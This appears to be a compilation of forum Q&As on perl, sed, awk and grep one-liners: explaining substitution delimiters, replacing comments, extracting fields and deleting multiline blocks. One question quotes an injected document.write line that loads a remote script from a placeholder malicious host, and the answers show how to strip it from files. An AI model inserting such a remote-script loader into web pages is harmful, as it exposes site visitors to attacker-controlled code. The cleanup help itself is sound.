Please explain one line of Perl code

I have this line from https://camlistore.googlesource.com/camlistore/+/master/third_party/rewrite-imports.sh
find . -type f -name '*.go' -exec perl -pi -e 's!"code.google.com/!"camlistore.org/third_party/code.google.com/!' {} \;
I would like help understanding what exactly this does:
perl -pi -e 's!"code.google.com/!"camlistore.org/third_party/code.google.com/!'
Especially the exclamation marks and the " characters. Thanks!

From perldoc perlrun:
-p means "run the expression for each line, and print the result"
-i means "edit the input file in place"
-e means "the next parameter is the Perl expression to evaluate"
For the expression itself:
The ! marks are the separators for the s (substitution) operator. Any non-alphanumeric character can be used for that - whatever follows the s.
The " characters don't mean anything special, they're just part of the text to be replaced, and the replacement.
So we have:
s: substitute
!: (separator)
"code.google.com/: text to find
!: (separator)
"camlistore.org/third_party/code.google.com/: replacement text
!: (separator)
Which all means:
For each line in the file
Find the first occurrence of the text "code.google.com/ (there is no g flag, so later occurrences on the same line are left alone)
And (if found) replace it with "camlistore.org/third_party/code.google.com/

The bangs ! are just an alternative delimiter for the search and replace regex s///.
Because the content of the search and replace includes forward slashes, it makes sense to use a different delimiter to avoid having to escape them all. Exclamation points are sometimes used for this purpose (s!!!), but my preferred alternative is braces: s{}{}.
As for what the code does, it replaces references to "code.google.com/ with "camlistore.org/third_party/code.google.com/ in the found files (the first one on each line, since there is no g flag).

This is a pretty straightforward search-and-replace. The s/PATTERN/REPLACEMENT/ operator sees if a string matches the regular expression pattern and replaces the part that matches with the value of the replacement string.
Since / characters are sometimes an inconvenient delimiter (for example, when dealing with web URIs), Perl allows you to swap them out for other characters; in this case they chose to use !.
The -p switch causes Perl to assume a loop around the code in question for processing lines. The -i switch allows input lines to be edited in-place as they are processed, optionally preserving the original in another file. (See perldoc perlrun for the gory details.)
So all this code is doing is replacing the text "code.google.com/ with "camlistore.org/third_party/code.google.com/ on each line where it appears.

Related

How to replace a comment line which start with specific characters

I have Fortran code with global comments, which start with a double exclamation mark (i.e., !!), and personal comments, which start with a single exclamation mark (i.e., !). I just want to hide my personal comment lines (or substitute the line with another line, e.g., '! jw'). For example, the original code looks like this:
!! This is a global comment
Code..
Code..
! This is a personal comment
code... ! This is a personal comment
!! This is a global comment
code...
Then, I want to update the original code as:
!! This is a global comment
Code..
Code..
! jw
code... ! jw
!! This is a global comment
code...
I have tried to use "sed" and "awk", but failed. Could someone help me? By the way, I prefer "sed" over "awk".
Use a Perl one-liner with a negative lookbehind:
perl -pe 's/(?<!!)!\s.*/! jw/' in_file > out_file
To change the file in-place:
perl -i.bak -pe 's/(?<!!)!\s.*/! jw/' in_file
To change multiple files in-place, for example ex*.f90 files:
perl -i.bak -pe 's/(?<!!)!\s.*/! jw/' ex*.f90
The Perl one-liner uses these command line flags:
-e : Tells Perl to look for code in-line, instead of in a file.
-p : Loop over the input one line at a time, assigning it to $_ by default. Add print $_ after each loop iteration.
-i.bak : Edit input files in-place (overwrite the input file). Before overwriting, save a backup copy of the original file by appending to its name the extension .bak.
(?<!!)! : Exclamation point that is not preceded by an exclamation point.
\s : Whitespace.
.* : Any character, repeated 0 or more times.
SEE ALSO:
perldoc perlrun: how to execute the Perl interpreter: command line switches
perldoc perlre: Perl regular expressions (regexes)
perldoc perlre: Perl regular expressions (regexes): Quantifiers; Character Classes and other Special Escapes; Assertions; Capture groups
perldoc perlre: Negative lookbehind
perldoc perlrequick: Perl regular expressions quick start
sed '/!!/!s/!.*/! jw/' file
/!!/! If the line does not contain !!, then
s/!.*/! jw/ Replace the first exclamation mark and everything after it with ! jw.
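The same kind of sample can be pushed through the sed version. The sketch also makes one trade-off visible: because the /!!/! address skips any line containing !!, a line that has both a !! and a personal ! comment is left untouched. The function name is hypothetical.

```shell
#!/bin/sh
# Hypothetical wrapper around the answer's sed command.
# /!!/! selects lines WITHOUT "!!"; on those, s/!.*/! jw/ rewrites from the first ! to the end.
sed_hide_comments() {
  sed '/!!/!s/!.*/! jw/'
}

printf '%s\n' '!! This is a global comment' 'Code..' '! This is a personal comment' \
  'code... ! This is a personal comment' | sed_hide_comments
```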
awk 'BEGIN{FS=OFS="!"}$2{$2=" jw"}1' file
BEGIN{FS=OFS="!"} Set the field separators to !.
$2{$2=" jw"} If the 2nd field is not empty, replace it with " jw".
1 Print the line.
If the line starts with ! then you could do something like
sed 's/^! .*/! jw/' mycode.fortran >newcodefile.fortran
I would put it into a new file and rename it afterwards. If you overwrite your file, you could end up causing problems if anything goes wrong.
The s command tells sed to search and replace.
The ^ means start of line, so if the comment is further along the line than the beginning, this won't find that comment.
So we search for a line that starts with ! followed by a space, and replace it, together with the rest of the line (the .*), with ! jw.
If you just run it as:
sed 's/^! .*/! jw/' mycode.fortran
without redirecting the output to a file, it will stream the output to your console so you can see whether it's working. Then run it again with the output redirected to a file using >, check the file, and then do your renaming. Don't get rid of your original code file until you're completely sure it worked and didn't do anything you didn't want.
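A sketch of the write-to-a-new-file, review, then rename workflow, using the anchored substitution s/^! .*/! jw/ (the .* makes the whole rest of a line-start comment go away, not just the "! "). File names follow the answer's examples; the scratch directory is an assumption so that nothing real is touched.

```shell
#!/bin/sh
# Work in a scratch directory so no real source file is touched.
cd "$(mktemp -d)" || exit 1
printf '%s\n' '!! global comment' '! personal comment' 'x = 1 ! inline comment' > mycode.fortran

# ^ anchors the match: only comments that start the line are rewritten.
sed 's/^! .*/! jw/' mycode.fortran > newcodefile.fortran

# Review the change first; diff exits with status 1 when the files differ.
diff mycode.fortran newcodefile.fortran || true

# Once satisfied: mv newcodefile.fortran mycode.fortran
```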

Extracting substring from inside bracketed string, where the substring may have spaces

I've got an application that has no useful api implemented, and the only way to get certain information is to parse string output. This is proving to be very painful...
I'm trying to achieve this in bash on SLES12.
Given I have the following strings:
QMNAME(QMTKGW01) STATUS(Running)
QMNAME(QMTKGW01) STATUS(Ended normally)
I want to extract the STATUS value, ie "Ended normally" or "Running".
Note that the line structure can move around, so I can't count on the "STATUS" being the second field.
The closest I have managed to get so far is to extract a single word from inside STATUS like so
echo "QMNAME(QMTKGW01) STATUS(Running)" | sed "s/^.*STATUS(\(\S*\)).*/\1/"
This works for "Running" but not for "Ended normally"
I've tried switching the \S* for [\S\s]* in both "grep -o" and "sed" but it seems to corrupt the entire regex.
This is purely a regex issue. With \S you asked to match only non-whitespace characters inside (..), but the failing case has a space in it, which that pattern does not allow. Keep it simple by explicitly listing the characters to match inside (..) as [a-zA-Z ]*, i.e. zero or more uppercase or lowercase letters and spaces:
sed 's/^.*STATUS(\([a-zA-Z ]*\)).*/\1/'
Or use the [:alnum:] character class if you want digits too:
sed 's/^.*STATUS(\([[:alnum:] ]*\)).*/\1/'
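Both patterns can be checked against the two sample lines. One behaviour worth knowing: if the status contains a character outside the class (the hyphenated value below is made up), the s command simply fails to match and sed prints the whole input line unchanged. The function names are hypothetical.

```shell
#!/bin/sh
# Capture letters and spaces only.
status_alpha() { sed 's/^.*STATUS(\([a-zA-Z ]*\)).*/\1/'; }
# Capture letters, digits and spaces.
status_alnum() { sed 's/^.*STATUS(\([[:alnum:] ]*\)).*/\1/'; }

printf '%s\n' 'QMNAME(QMTKGW01) STATUS(Running)' 'QMNAME(QMTKGW01) STATUS(Ended normally)' | status_alpha
# A value with a hyphen is outside both classes, so the line comes back as-is.
printf '%s\n' 'QMNAME(QMTKGW01) STATUS(Ended-unexpectedly)' | status_alnum
```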
sed 's/.*STATUS(\([^)]*\)).*/\1/' file
Output:
Running
Ended normally
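The bracket expression [^)]* means "any run of characters other than a closing parenthesis", so spaces, digits and hyphens are all captured without listing them. This sketch, with a hypothetical function name, also uses sed -n with the p flag so that lines without a STATUS(...) field are dropped instead of being echoed unchanged.

```shell
#!/bin/sh
# -n suppresses automatic printing; the trailing p prints only lines where s succeeded.
status_value() { sed -n 's/.*STATUS(\([^)]*\)).*/\1/p'; }

printf '%s\n' 'QMNAME(QMTKGW01) STATUS(Running)' \
  'QMNAME(QMTKGW01) STATUS(Ended normally)' \
  'a line without a status field' | status_value
```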
Extracting a substring matching a given pattern is a job for grep, not sed. We should use sed when we must edit the input string. (A lot of people use sed and even awk just to extract substrings, but that's wasteful in my opinion.)
So, here is a grep solution. We need to make some assumptions (in any solution) about your input; some are easy to relax, others are not. In your example the word STATUS is always capitalized, and it is immediately followed by the opening parenthesis (no space, no colon, etc.). These assumptions can be relaxed easily. More importantly, and not easy to work around: there are no nested parentheses. You want the longest substring of non-closing-parenthesis characters following the opening parenthesis, no matter what they are.
With these assumptions:
$ grep -oP '\bSTATUS\(\K[^)]*(?=\))' << EOF
> QMNAME(QMTKGW01) STATUS(Running)
> QMNAME(QMTKGW01) STATUS(Ended normally)
> EOF
Running
Ended normally
Explanation:
Command options: o to return only the matched substring; P to use Perl extensions (the \K marker and the lookahead). The regexp: we look for a word boundary (\b) - so the word STATUS is a complete word, not part of a longer word like SUBSTATUS; then the word STATUS and opening parenthesis. This is required for a match, but \K instructs that this part of the matched string will not be returned in the output. Then we seek zero or more non-closing-parenthesis characters ([^)]*) and we require that this be followed by a closing parenthesis - but the closing parenthesis is also not included in the returned string. That's a "lookahead" (the (?= ... ) construct).

Why is my sed multiline find-and-replace not working as expected?

I have a simple sed command that I am using to replace everything between (and including) //thistest.com-- and --thistest.com with nothing (remove the block all together):
sudo sed -i "s#//thistest\.com--.*--thistest\.com##g" my.file
The contents of my.file are:
//thistest.com--
zone "awebsite.com" {
type master;
file "some.stuff.com.hosts";
};
//--thistest.com
As I am using # as my delimiter for the regex, I don't need to escape the / characters. I am also properly (I think) escaping the . in .com. So I don't see exactly what is failing.
Why isn't the entire block being replaced?
You have two problems:
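Sed doesn't do multiline pattern matches, at least not the way you're expecting it to: it reads its input one line at a time, so unless you explicitly append lines to the pattern space (with N, H and the like), .* only ever sees a single line and can never reach from //thistest.com-- to --thistest.com. However, you can use multiline addresses as an alternative.
When a regex address uses a delimiter other than /, the opening delimiter must be preceded by a backslash (\#...#); only the s (and y) commands accept an alternate delimiter without one.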
So, the following will work with your posted corpus in both GNU and BSD flavors:
sed '\#^//thistest\.com--#, \#^//--thistest\.com# d' /tmp/corpus
Note that in this version, we tell sed to match all lines between (and including) the two patterns. The opening delimiter of each address pattern is properly escaped. The command has also been changed to d for delete instead of s for substitute, and some whitespace was added for readability.
I've also chosen to anchor the address patterns to the start of each line. You may or may not find that helpful with this specific corpus, but it's generally wise to do so when you can, and doesn't seem to hurt your use case.
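The range form can be checked against the posted corpus wrapped in two extra lines, which should survive the deletion. The surrounding lines and the function name are made up for the test.

```shell
#!/bin/sh
# Delete every line from the one starting //thistest.com-- through the one starting //--thistest.com.
drop_thistest_block() {
  sed '\#^//thistest\.com--#, \#^//--thistest\.com# d'
}

drop_thistest_block <<'EOF'
// kept before
//thistest.com--
zone "awebsite.com" {
type master;
file "some.stuff.com.hosts";
};
//--thistest.com
// kept after
EOF
```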
# separation by line with 1 s//
sed -n -e 'H;${x;s#\n//thistest\.com--.*\n//--thistest\.com##;s#^\n##;p}' YourFile
# separation by line with address pattern
sed -e '\#//thistest.com--#,\#//--thistest.com# d' YourFile
# separation only by char (could be CR, CR/LF, ";" or "oneline") with s//
sed -n -e '1h;1!H;${x;s#//thistest\.com--.*//--thistest\.com##;p}' YourFile
Notes:
the s// versions assume there is only one thistest section per file (if there are more, they remove everything from the first opening marker to the last closing one);
the s// versions are not suited to huge files, because they load the entire file into memory;
the address-range version cannot select a section that opens and closes on the same line (it looks for the first pattern to start the range, and only on a following line for the second pattern to stop it), but it is very efficient on big files and/or files with several sections.
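The first note is easy to see in practice. Assuming GNU sed (whose . also matches the newlines that 1h;1!H joins into the pattern space), the whole-file substitution below removes everything from the first opening marker to the last closing one, while the address-range form removes each block separately. The sample lines and function names are made up. Also visible: the substitution leaves an empty line where the block was, because the newlines on either side of it are not part of the match.

```shell
#!/bin/sh
# Whole file in the pattern space, then one greedy s///.
drop_slurp() {
  sed -n -e '1h;1!H;${x;s#//thistest\.com--.*//--thistest\.com##;p}'
}
# Line-by-line address range.
drop_range() {
  sed -e '\#//thistest\.com--#,\#//--thistest\.com# d'
}

sample() {
  printf '%s\n' 'a' '//thistest.com--' 'x' '//--thistest.com' 'keep' \
    '//thistest.com--' 'y' '//--thistest.com' 'b'
}

sample | drop_slurp   # "keep" is lost: .* ran on to the last closing marker
sample | drop_range   # "keep" survives
```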

How to delete multiple lines from text file, including matched line?

I found some malicious JavaScript inserted into dozens of files.
The malicious code looks like this:
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');
/*/123456*/
Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."
In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.
sed -i '/pattern to match/d' ./infile
But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.
So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?
I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js
You need to match on the begin and end comments, not the document.write line:
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
This uses the % symbol in place of the more usual / to delimit the patterns, which is usually a good idea when the pattern contains slashes and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
From the sed manual on Mac OS X:
In a context address, any character other than a backslash ('\') or newline character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be treated literally. For example, in the context address \xabc\xdefx, the RE delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
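Since the question mentions dozens of files, here is a sketch of combining grep -rl (to list only the files that contain the URL) with the range delete. It assumes GNU sed, whose -i takes no argument (BSD/macOS sed wants -i ''), and it assumes every infected file uses the same /*123456*/ marker as the example; the function, directory and file names are made up.

```shell
#!/bin/sh
# Delete from the /*123456*/ line through the /*/123456*/ line, in place (GNU sed -i).
clean_file() {
  sed -i -e '\%/\*123456\*/%,\%/\*/123456\*/%d' "$1"
}

# Scratch tree with one infected and one clean file.
dir=$(mktemp -d)
cat > "$dir/infected.js" <<'EOF'
var before = 1;
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');

/*/123456*/
var after = 2;
EOF
printf '%s\n' 'var clean = 3;' > "$dir/clean.js"

# grep -rl lists only the files that mention the URL; each one is cleaned in turn.
grep -rl 'maliciousurl' "$dir" | while IFS= read -r f; do
  clean_file "$f"
done

cat "$dir/infected.js"
```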
Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. In that case sed is awkward: it has no relative line offsets (/x/+1 is not allowed, let alone /x/-1; GNU sed does accept a range such as /x/,+2 for lines after a match, but nothing reaches the line before it). At that point, you probably fall back on ed (or perhaps ex):
ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.

Confining Substitution to Match Space Using sed?

Is there a way to substitute only within the match space using sed?
I.e. given the following line, is there a way to substitute only the "." chars that are contained within the matching single quotes and protect the "." chars that are not enclosed by single quotes?
Input:
'ECJ-4YF1H10.6Z' ! 'CAP' ! '10.0uF' ! 'TOL' ; MGCDC1008.S1 MGCDC1009.A2
Desired result:
'ECJ-4YF1H10-6Z' ! 'CAP' ! '10_0uF' ! 'TOL' ; MGCDC1008.S1 MGCDC1009.A2
Or is this just a job to which perl or awk might be better suited?
Thanks for your help,
Mark
Give the following a try which uses the divide-and-conquer technique:
sed "s/\('[^']*'\)/\n&\n/g;s/\(\n'[^.]*\)\.\([^']*Z'\)/\1-\2/g;s/\(\n'[^.]*\)\.\([^']*uF'\)/\1_\2/g;s/\n//g" inputfile
Explanation:
s/\('[^']*'\)/\n&\n/g - Add newlines before and after each pair of single quotes with their contents
s/\(\n'[^.]*\)\.\([^']*Z'\)/\1-\2/g - Using a newline and the single quotes to key on, replace the dot with a dash for strings that end in "Z"
s/\(\n'[^.]*\)\.\([^']*uF'\)/\1_\2/g - Using a newline and the single quotes to key on, replace the dot with an underscore for strings that end in "uF"
s/\n//g - Remove the newlines added in the first step
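The four steps can be checked against the input line from the question. This sketch assumes GNU sed, since \n in the replacement part (used in the first step) is not portable; the function name is hypothetical.

```shell
#!/bin/sh
# 1) wrap each '...' in newlines, 2) dot -> dash in quoted values ending in Z,
# 3) dot -> underscore in quoted values ending in uF, 4) remove the helper newlines.
fix_quoted_dots() {
  sed "s/\('[^']*'\)/\n&\n/g;s/\(\n'[^.]*\)\.\([^']*Z'\)/\1-\2/g;s/\(\n'[^.]*\)\.\([^']*uF'\)/\1_\2/g;s/\n//g"
}

printf '%s\n' "'ECJ-4YF1H10.6Z' ! 'CAP' ! '10.0uF' ! 'TOL' ; MGCDC1008.S1 MGCDC1009.A2" | fix_quoted_dots
```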
You can restrict the command to acting only on certain lines:
sed "/foo/{s/\('[^']*'\)/\n&\n/g;s/\(\n'[^.]*\)\.\([^']*Z'\)/\1-\2/g;s/\(\n'[^.]*\)\.\([^']*uF'\)/\1_\2/g;s/\n//g}" inputfile
where you would substitute some regex in place of "foo".
Some versions of sed like to be spoon fed (instead of semicolons between commands, use -e):
sed -e "/foo/{s/\('[^']*'\)/\n&\n/g" -e "s/\(\n'[^.]*\)\.\([^']*Z'\)/\1-\2/g" -e "s/\(\n'[^.]*\)\.\([^']*uF'\)/\1_\2/g" -e "s/\n//g}" inputfile
$ cat phoo1234567_sedFix.sed
#! /bin/sed -f
/'[0-9][0-9]\.[0-9][a-zA-Z][a-zA-Z]'/s/'\([0-9][0-9]\)\.\([0-9][a-zA-Z][a-zA-Z]\)'/'\1_\2'/
This handles the '10.0uF' value in your example. If the pattern you need to fix isn't always like the example you provided, then you'll need multiple copies of this line, with regular expressions modified to match your new change targets.
Note that the command is in 2 parts: "/'[0-9][0-9]\.[0-9][a-zA-Z][a-zA-Z]'/" says it must match lines with this pattern, while the trailing "s/'\([0-9][0-9]\)\.\([0-9][a-zA-Z][a-zA-Z]\)'/'\1_\2'/" is the part that does the substitution. Because the single quotes are part of the match, the replacement writes them back around \1_\2. You can add a 'g' after the final '/' to make this substitution happen on all instances of this pattern in each line.
The \(\) pairs in the match pattern get converted into the numbered buffers on the substitution side of the command (i.e. \1 \2). Standard awk's sub() and gsub() have no equivalent of these back-references (gawk adds gensub() for that), which is one place where sed has the edge.
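A quick check against the input line from the question. Since the single quotes are consumed by the match, the replacement in this sketch writes them back around \1_\2. It is written as a plain sed command (the leading address is optional, because s only changes lines where its own pattern matches), and the function name is hypothetical. Only the uF-style value is handled, so the 6Z value keeps its dot.

```shell
#!/bin/sh
# The quotes are matched, so they must reappear around \1_\2 in the replacement.
fix_uf_dots() {
  sed "s/'\([0-9][0-9]\)\.\([0-9][a-zA-Z][a-zA-Z]\)'/'\1_\2'/g"
}

printf '%s\n' "'ECJ-4YF1H10.6Z' ! 'CAP' ! '10.0uF' ! 'TOL' ; MGCDC1008.S1 MGCDC1009.A2" | fix_uf_dots
```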
If you're going to do much of this kind of work, I highly recommend O'Reilly's sed & awk book. The time spent going through how sed works will be paid back many times.
I hope this helps.
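This is a job best suited to awk, or to any language that supports breaking/splitting strings.
IMO, using sed for this task, which is regex-based, while doable, is difficult to read and debug, hence not the most appropriate tool for the job. No offense to sed fanatics.
awk '{
for(i=1;i<=NF;i++) {
if ($i ~ /\047/ ){
gsub(/\./,"_",$i)
}
}
}1' file
The above says: for each field (the field separator is whitespace by default), check whether it contains a single quote (\047 is its octal code), and if it does, replace every "." in it with "_". The dot is written as the regex /\./ because a bare "." would match any character and turn the whole field into underscores. This method is simple and doesn't need complicated regexes, but it assumes quoted values contain no spaces, and it turns the dot in 'ECJ-4YF1H10.6Z' into an underscore rather than the dash the question asked for.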
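Both the whitespace-split version and a variant that splits on the quote character itself can be checked on the sample line. The second function is an alternative approach, not the answer's: with FS set to a single quote, every even-numbered field is text between a pair of quotes, so quoted values containing spaces are handled too. The function names are hypothetical, and neither turns the 6Z dot into a dash; that part of the desired output needs a separate rule.

```shell
#!/bin/sh
# Answer's approach with the regex fixed: /\./ is a literal dot ("." would match any character).
dots_in_quoted_fields() {
  awk '{
    for (i = 1; i <= NF; i++)
      if ($i ~ /\047/)
        gsub(/\./, "_", $i)
  } 1'
}

# Alternative: split on the quote, so fields 2, 4, 6, ... lie between quotes.
dots_between_quotes() {
  awk 'BEGIN { FS = OFS = "\047" } { for (i = 2; i <= NF; i += 2) gsub(/\./, "_", $i) } 1'
}

line="'ECJ-4YF1H10.6Z' ! 'CAP' ! '10.0uF' ! 'TOL' ; MGCDC1008.S1 MGCDC1009.A2"
printf '%s\n' "$line" | dots_in_quoted_fields
printf '%s\n' "$line" | dots_between_quotes
```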